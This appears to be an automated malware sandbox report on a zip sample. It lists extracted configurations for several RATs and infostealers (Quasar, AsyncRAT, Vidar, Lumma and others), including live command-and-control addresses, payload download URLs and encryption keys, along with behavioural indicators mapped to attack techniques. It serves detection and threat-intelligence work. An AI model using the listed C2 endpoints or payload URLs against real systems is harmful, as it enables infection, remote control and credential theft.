asyncrat | 12fce52d084a8c7efa638c88fa2307bca7c038a49fe566ebb05533cacf17efbd

Resubmissions

21-01-2025 02:07

250121-cjzbwa1jhp 10

20-01-2025 18:36

250120-w88fmasqfy 10

20-01-2025 18:27

250120-w3q96asnh1 10

Analysis

max time kernel
266s
max time network
280s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
20-01-2025 18:36

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

4363463463464363463463463.zip
Size

393KB
MD5

c223234ed4e0bc5325c0b09744f06b6d
SHA1

ecfdd884ee353ceb205be8729eb683aeca5cce2e
SHA256

fda46baacb7dcd211250fe29aaa2b1b17657961675b4d8c6415a0c3d004d00a6
SHA512

b36c66d8c4c3c2d46a24bb85bd165e71b862f1de8cdc600f343f12a0238e3a5b3d48cb91a06acd6e0024e30798ddc715c211b4d59a65197d8058e3c937df4d1f
SSDEEP

6144:mw6UunfgHXYz9cZLa2MM1ZDQblzXhVqWvSI6Xr6i5OywSiTbBeqscDoAUll4QwjS:mJUKz9cB3MMnmd+W6vXmi5ONvMc05yQ

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

193.161.193.99:43242

192.168.1.101:4782

5.144.179.134:1604

192.168.100.2:4444

Mutex

45bfb701-bea2-411a-948d-9a6abe001f83

Attributes

encryption_key
80594967BC0A4839C316A44D62DE36E9BF18177F
install_name
SYSTEM26.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

SGVP

192.168.1.9:4782

150.129.206.176:4782

Ai-Sgvp-33452.portmap.host:33452

Mutex

a35ec7b7-5a95-4207-8f25-7af0a7847fa5

Attributes

encryption_key
09BBDA8FF0524296F02F8F81158F33C0AA74D487
install_name
User Application Data.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windowns Client Startup
subdirectory
Quasar

Extracted

Family

vidar

Version

11.3

Botnet

a21440e9f7223be06be5f5e2f94969c7

https://t.me/asg7rd

https://steamcommunity.com/profiles/76561199794498376

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Extracted

Family

stealc

Botnet

Voov3

http://154.216.17.90

Attributes

url_path
/a48146f6763ef3af.php

Extracted

Family

vidar

Botnet

p1up1

https://t.me/m3wm0w

https://steamcommunity.com/profiles/76561199804377619

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

Mutex

7U2HW8ZYjc9H

Attributes

delay
3
install
true
install_file
Discord.exe
install_folder
%AppData%

aes.plain

Extracted

Family

lumma

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://voter-screnn.cyou/api

https://atten-supporse.biz/api

https://ponintnykqwm.shop/api

Extracted

Family

redline

Botnet

first

212.56.41.77:1912

Extracted

Family

quasar

Version

1.4.0

Botnet

Target

127.0.0.1:6070

affasdqa.ddns.net:6070

haffasdqa.duckdns.org:6070

Mutex

670d21b7-71ed-4958-9ba7-a58fa54d8203

Attributes

encryption_key
25B2622CE0635F9A273AB61B1B7D7B94220AC509
install_name
svhoste.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svhoste
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

Kurban

89.213.56.109:80

89.213.56.109:4782

Mutex

98b3deca-7447-4862-905a-28f904856d31

Attributes

encryption_key
705A067280199C09F2EC77A633F5E68C9020B7B5
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

RuntimeBroker

siembonik-44853.portmap.host:44853

Mutex

df483a08-855b-4bf5-bdcb-174788919889

Attributes

encryption_key
A8573AD4438B1D5F6207F7C03CCC7F1E2D4B13DF
install_name
RuntimeBroker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
RuntimeBroker
subdirectory
am1

Extracted

Family

quasar

Version

1.4.1

Botnet

Java

dez345-37245.portmap.host:37245

dez3452-33187.portmap.host:33187

Mutex

f0e53bcd-851e-44af-8fd5-07d8ab5ed968

Attributes

encryption_key
65439CE7DEF3E0FAF01C526FEA90388C9FD487A1
install_name
java.exe
log_directory
Logs
reconnect_delay
3000
startup_key
java ©
subdirectory
Programfiles

Extracted

Family

quasar

Version

1.4.1

Botnet

Windows Client

148.163.102.170:4782

Mutex

4c18e02c-7c39-4a5e-bbef-16fe13828101

Attributes

encryption_key
73B0A3AC50C78E243EA93BF9E60C9BC63D63CA26
install_name
Sever Startup.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Startup
subdirectory
Windows Startup

Extracted

Family

redline

Botnet

LiveTraffoc

4.185.56.82:42687

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

217.195.195.46:1604

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

18.141.204.5:80

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:8080

127.0.0.1:18274

6.tcp.eu.ngrok.io:6606

6.tcp.eu.ngrok.io:7707

6.tcp.eu.ngrok.io:8808

6.tcp.eu.ngrok.io:8080

6.tcp.eu.ngrok.io:18274

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
true
install_file
syteam.exe
install_folder
%Temp%

aes.plain

Extracted

Family

stealc

Botnet

QQtalk1

http://154.216.17.90

Attributes

url_path
/a48146f6763ef3af.php

Extracted

Family

quasar

Version

1.4.1

Botnet

ZJEB

VIPEEK1990-25013.portmap.host:25013

Mutex

ad21b115-2c1b-40cb-adba-a50736b76c21

Attributes

encryption_key
3EBA8BC34FA983893A9B07B831E7CEB183F7492D
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Security Service
subdirectory
SubDir

Extracted

Family

vipkeylogger

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office

85.192.29.60:5173

Mutex

QAPB6w0UbYXMvQdKRF

Attributes

encryption_key
pxC3g4rfVijQxK1hMGwM
install_name
csrss.exe
log_directory
Logs
reconnect_delay
3000
startup_key
NET framework
subdirectory
SubDir

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Detect Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral1/files/0x001900000002ab7b-315.dat	family_vidar_v7
behavioral1/memory/4944-321-0x00000000001D0000-0x00000000004D0000-memory.dmp	family_vidar_v7
behavioral1/memory/4944-368-0x00000000001D0000-0x00000000004D0000-memory.dmp	family_vidar_v7

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/files/0x001b00000002ae9d-32537.dat	family_xworm
behavioral1/files/0x001700000002b1d8-32740.dat	family_xworm
behavioral1/files/0x001000000002b5d7-38410.dat	family_xworm

Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit
Lockbit family
lockbit
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Meduza
Meduza is a crypto wallet and info stealer written in C++.
stealer meduza

Meduza Stealer payload 1 IoCs

resource	yara_rule
behavioral1/files/0x001900000002ab85-580.dat	family_meduza

Meduza family
meduza
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	62852	2328	schtasks.exe	113
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	28360	2328	schtasks.exe	113
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	22736	2328	schtasks.exe	113

Quasar RAT 11 IoCs

Quasar is an open source Remote Access Tool.

trojan spyware quasar

description	flow	ioc	Process
	412	reallyfreegeoip.org	Process not Found
	1421	api.ipify.org	Process not Found
Key opened		\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
	37	api.ipify.org	Process not Found
	143	api.ipify.org	Process not Found
	5781	api.ipify.org	Process not Found
	413	checkip.dyndns.org	Process not Found
	621	reallyfreegeoip.org	Process not Found
	1694	ip-api.com	Process not Found
	6049	api.ipify.org	Process not Found
	14254	ip-api.com	Process not Found

Quasar family
quasar

Quasar payload 41 IoCs

resource	yara_rule
behavioral1/files/0x001900000002ab66-215.dat	family_quasar
behavioral1/memory/3580-221-0x0000000000540000-0x0000000000864000-memory.dmp	family_quasar
behavioral1/memory/788-223-0x0000000000DB0000-0x00000000010D4000-memory.dmp	family_quasar
behavioral1/files/0x0002000000025cd7-519.dat	family_quasar
behavioral1/memory/7340-529-0x0000000000D90000-0x00000000010B4000-memory.dmp	family_quasar
behavioral1/memory/7852-685-0x00000000008C0000-0x0000000000BE4000-memory.dmp	family_quasar
behavioral1/files/0x001900000002ac67-981.dat	family_quasar
behavioral1/files/0x001a00000002ab65-1004.dat	family_quasar
behavioral1/memory/7776-999-0x0000000000C80000-0x0000000000D04000-memory.dmp	family_quasar
behavioral1/memory/7824-1022-0x0000000000690000-0x00000000009B4000-memory.dmp	family_quasar
behavioral1/files/0x0003000000025cc8-1027.dat	family_quasar
behavioral1/memory/7916-1049-0x0000000000980000-0x0000000000CA4000-memory.dmp	family_quasar
behavioral1/files/0x001500000002ac9d-1270.dat	family_quasar
behavioral1/memory/8688-1320-0x0000000000DE0000-0x000000000112E000-memory.dmp	family_quasar
behavioral1/files/0x001b00000002aa4b-1411.dat	family_quasar
behavioral1/memory/9612-1591-0x00000000002B0000-0x00000000005D4000-memory.dmp	family_quasar
behavioral1/files/0x001a00000002ac8d-2311.dat	family_quasar
behavioral1/memory/8832-2413-0x0000000000210000-0x0000000000534000-memory.dmp	family_quasar
behavioral1/files/0x000c00000002586f-7874.dat	family_quasar
behavioral1/files/0x0003000000028f39-26429.dat	family_quasar
behavioral1/memory/30048-27893-0x0000000000B70000-0x0000000000E94000-memory.dmp	family_quasar
behavioral1/files/0x0004000000000693-27836.dat	family_quasar
behavioral1/memory/37860-28229-0x0000000000730000-0x0000000000A7E000-memory.dmp	family_quasar
behavioral1/memory/38024-28227-0x0000000000730000-0x000000000077E000-memory.dmp	family_quasar
behavioral1/files/0x001b00000002ad1e-30674.dat	family_quasar
behavioral1/files/0x001700000002b10d-30307.dat	family_quasar
behavioral1/files/0x001800000002b126-31924.dat	family_quasar
behavioral1/files/0x001700000002b136-32754.dat	family_quasar
behavioral1/files/0x001a00000002b095-33740.dat	family_quasar
behavioral1/files/0x001a00000002ada7-35754.dat	family_quasar
behavioral1/files/0x001800000002b1bd-36853.dat	family_quasar
behavioral1/files/0x001b00000002ad9b-37031.dat	family_quasar
behavioral1/files/0x008200000002b439-37191.dat	family_quasar
behavioral1/files/0x001c00000002ad81-37751.dat	family_quasar
behavioral1/files/0x000f00000002b5d9-37674.dat	family_quasar
behavioral1/files/0x001000000002b59c-38270.dat	family_quasar
behavioral1/files/0x002100000002ad72-38546.dat	family_quasar
behavioral1/files/0x000e00000002b61e-38500.dat	family_quasar
behavioral1/files/0x000e00000002b5f9-38055.dat	family_quasar
behavioral1/files/0x000300000002a521-38632.dat	family_quasar
behavioral1/files/0x000400000002a548-38735.dat	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

resource	yara_rule
behavioral1/memory/8080-961-0x0000000000080000-0x00000000000D2000-memory.dmp	family_redline
behavioral1/files/0x001a00000002aba6-825.dat	family_redline
behavioral1/memory/9592-1577-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral1/files/0x00020000000296f2-26393.dat	family_redline
behavioral1/files/0x001b00000002ad8b-34163.dat	family_redline

Redline family
redline

Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs

resource	yara_rule
behavioral1/files/0x001900000002b0a4-29976.dat	family_lockbit

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Vipkeylogger family
vipkeylogger
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000002930f-37323.dat	family_xmrig
behavioral1/files/0x000700000002930f-37323.dat	xmrig

Xmrig family
xmrig
Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 14 IoCs

rat

resource	yara_rule
behavioral1/files/0x001900000002ab94-661.dat	family_asyncrat
behavioral1/files/0x001a00000002ab84-1387.dat	family_asyncrat
behavioral1/files/0x001b00000002aca6-1843.dat	family_asyncrat
behavioral1/files/0x0004000000025cc3-2155.dat	family_asyncrat
behavioral1/files/0x001d00000002ac15-2142.dat	family_asyncrat
behavioral1/files/0x001a00000002ae9e-26444.dat	family_asyncrat
behavioral1/files/0x00050000000006a1-29792.dat	family_asyncrat
behavioral1/files/0x001700000002b135-31692.dat	family_asyncrat
behavioral1/files/0x0003000000025b13-29954.dat	family_asyncrat
behavioral1/files/0x001e00000002ad71-33745.dat	family_asyncrat
behavioral1/files/0x001100000002b431-37020.dat	family_asyncrat
behavioral1/files/0x000d00000002b614-38068.dat	family_asyncrat
behavioral1/files/0x000d00000002b647-38485.dat	family_asyncrat
behavioral1/files/0x000e00000002b636-38454.dat	family_asyncrat

Contacts a large (13298) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

DCRat payload 5 IoCs

rat

resource	yara_rule
behavioral1/files/0x001900000002ad60-1316.dat	family_dcrat_v2
behavioral1/memory/8624-1382-0x0000000000030000-0x0000000000114000-memory.dmp	family_dcrat_v2
behavioral1/files/0x001700000002b0c4-29971.dat	family_dcrat_v2
behavioral1/files/0x001b00000002b0a7-37538.dat	family_dcrat_v2
behavioral1/files/0x000d00000002b615-38119.dat	family_dcrat_v2

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

ModiLoader Second Stage 1 IoCs

resource	yara_rule
behavioral1/memory/2960-5597-0x0000000000400000-0x0000000000414000-memory.dmp	modiloader_stage2

Blocklisted process makes network request 2 IoCs

flow	pid	Process
22	3560	ciscotest.exe
22	3560	ciscotest.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
34928	powershell.exe
39316	powershell.exe
37792	powershell.exe
39756	powershell.exe
50288	powershell.exe
45728	powershell.exe
17984	powershell.exe
36672	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 17 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
10004	netsh.exe
8644	netsh.exe
9072	netsh.exe
29624	netsh.exe
28536	netsh.exe
36464	netsh.exe
5800	netsh.exe
7656	netsh.exe
13544	netsh.exe
32528	netsh.exe
36484	netsh.exe
37536	netsh.exe
9996	netsh.exe
7984	netsh.exe
48508	netsh.exe
10088	netsh.exe
48608	netsh.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x0003000000025cc9-893.dat	net_reactor
behavioral1/memory/7828-971-0x0000000000570000-0x00000000005BE000-memory.dmp	net_reactor

Executes dropped EXE 22 IoCs

pid	Process
1372	4363463463464363463463463.exe
2300	._cache_4363463463464363463463463.exe
2184	Synaptics.exe
3656	._cache_Synaptics.exe
4056	4363463463464363463463463.exe
1428	sela.exe
3432	._cache_4363463463464363463463463.exe
3580	Client-built.exe
3024	SYSTEM26.exe
416	4363463463464363463463463.exe
3084	._cache_4363463463464363463463463.exe
2476	svchost.exe
3116	keylogger.exe
3768	4363463463464363463463463.exe
4416	._cache_4363463463464363463463463.exe
668	PCclear_Eng_mini.exe
3560	ciscotest.exe
4944	njrtdhadawt.exe
4400	WindowsServices.exe
476	4363463463464363463463463.exe
2144	._cache_4363463463464363463463463.exe
4780	4363463463464363463463463.exe

Loads dropped DLL 13 IoCs

pid	Process
2184	Synaptics.exe
2184	Synaptics.exe
4056	4363463463464363463463463.exe
4056	4363463463464363463463463.exe
416	4363463463464363463463463.exe
416	4363463463464363463463463.exe
3768	4363463463464363463463463.exe
3768	4363463463464363463463463.exe
4944	njrtdhadawt.exe
476	4363463463464363463463463.exe
476	4363463463464363463463463.exe
4780	4363463463464363463463463.exe
4780	4363463463464363463463463.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
52136	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x001700000002b0c0-29995.dat	vmprotect

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	4363463463464363463463463.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 56 IoCs

Web Service

T1102

flow	ioc
5717	raw.githubusercontent.com
203	raw.githubusercontent.com
297	raw.githubusercontent.com
1422	2.tcp.ngrok.io
24	raw.githubusercontent.com
237	raw.githubusercontent.com
464	raw.githubusercontent.com
233	raw.githubusercontent.com
9	raw.githubusercontent.com
14042	raw.githubusercontent.com
256	raw.githubusercontent.com
1030	raw.githubusercontent.com
1421	6.tcp.eu.ngrok.io
10125	2.tcp.ngrok.io
12150	6.tcp.eu.ngrok.io
16	raw.githubusercontent.com
130	raw.githubusercontent.com
176	raw.githubusercontent.com
348	raw.githubusercontent.com
389	raw.githubusercontent.com
1694	discord.com
3231	discord.com
3474	raw.githubusercontent.com
6	raw.githubusercontent.com
112	raw.githubusercontent.com
263	raw.githubusercontent.com
69	raw.githubusercontent.com
386	raw.githubusercontent.com
898	raw.githubusercontent.com
2920	raw.githubusercontent.com
8933	raw.githubusercontent.com
57	raw.githubusercontent.com
201	raw.githubusercontent.com
272	raw.githubusercontent.com
14577	raw.githubusercontent.com
92	raw.githubusercontent.com
247	raw.githubusercontent.com
8179	raw.githubusercontent.com
1425	raw.githubusercontent.com
1	raw.githubusercontent.com
90	raw.githubusercontent.com
1422	raw.githubusercontent.com
578	raw.githubusercontent.com
104	raw.githubusercontent.com
149	raw.githubusercontent.com
165	raw.githubusercontent.com
276	raw.githubusercontent.com
196	raw.githubusercontent.com
503	raw.githubusercontent.com
5245	raw.githubusercontent.com
620	raw.githubusercontent.com
3908	raw.githubusercontent.com
124	raw.githubusercontent.com
166	raw.githubusercontent.com
387	raw.githubusercontent.com
395	raw.githubusercontent.com

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
412	reallyfreegeoip.org
413	checkip.dyndns.org
1694	ip-api.com
14254	ip-api.com
37	api.ipify.org
621	reallyfreegeoip.org
1421	api.ipify.org
5781	api.ipify.org
6049	api.ipify.org
143	api.ipify.org

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
31916	arp.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1648	cmd.exe
36128	powercfg.exe
37088	powercfg.exe
49996	powercfg.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/8700-1223-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral1/files/0x001900000002ad47-1274.dat	upx
behavioral1/memory/9468-1563-0x0000000000400000-0x0000000000A80000-memory.dmp	upx
behavioral1/memory/8700-1562-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral1/files/0x000400000000f49e-2606.dat	upx
behavioral1/memory/9468-2303-0x0000000000400000-0x0000000000A80000-memory.dmp	upx
behavioral1/memory/2960-5597-0x0000000000400000-0x0000000000414000-memory.dmp	upx
behavioral1/memory/9468-26408-0x0000000000400000-0x0000000000A80000-memory.dmp	upx
behavioral1/files/0x001d00000002ad77-37657.dat	upx
behavioral1/files/0x001100000002b5d6-38513.dat	upx

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001900000002ab80-761.dat	pyinstaller
behavioral1/files/0x001900000002abac-1858.dat	pyinstaller
behavioral1/files/0x0002000000029cef-31278.dat	pyinstaller
behavioral1/files/0x001c00000002b0b7-34159.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 13 IoCs

pid	pid_target	Process	procid_target
6752	7828	WerFault.exe	236
9444	8580	WerFault.exe	267
10068	8680	WerFault.exe	262
15032	8144	WerFault.exe	233
11244	8144	WerFault.exe	233
66284	11356	WerFault.exe	374
13224	37980	WerFault.exe	396
57000	14180	WerFault.exe	437
52108	1212	WerFault.exe	426
23744	14180	WerFault.exe	437
27064	21880	WerFault.exe	509
36984	44672	WerFault.exe	413
37440	52888	WerFault.exe	466

System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	njrtdhadawt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sela.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keylogger.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCclear_Eng_mini.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ciscotest.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
7468	PING.EXE
26080	cmd.exe
53932	PING.EXE
30748	PING.EXE
37200	GoogleUpdate.exe
37612	cmd.exe
50920	PING.EXE
3560	cmd.exe

NSIS installer 8 IoCs

installer

resource	yara_rule
behavioral1/files/0x001900000002ab87-703.dat	nsis_installer_2
behavioral1/files/0x001400000002ae68-28214.dat	nsis_installer_1
behavioral1/files/0x001400000002ae68-28214.dat	nsis_installer_2
behavioral1/files/0x001b00000002ab9e-32120.dat	nsis_installer_2
behavioral1/files/0x001700000002ae5b-29946.dat	nsis_installer_1
behavioral1/files/0x001700000002ae5b-29946.dat	nsis_installer_2
behavioral1/files/0x0006000000025ccc-38219.dat	nsis_installer_1
behavioral1/files/0x0006000000025ccc-38219.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	njrtdhadawt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	njrtdhadawt.exe

Delays execution with timeout.exe 6 IoCs

defense_evasion

pid	Process
9804	timeout.exe
65972	timeout.exe
29988	timeout.exe
35548	timeout.exe
50968	timeout.exe
4420	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4076	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Interacts with shadow copies 3 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
52756	vssadmin.exe
11524	vssadmin.exe

Kills process with taskkill 4 IoCs

defense_evasion

pid	Process
62608	taskkill.exe
25812	taskkill.exe
26432	taskkill.exe
27364	taskkill.exe

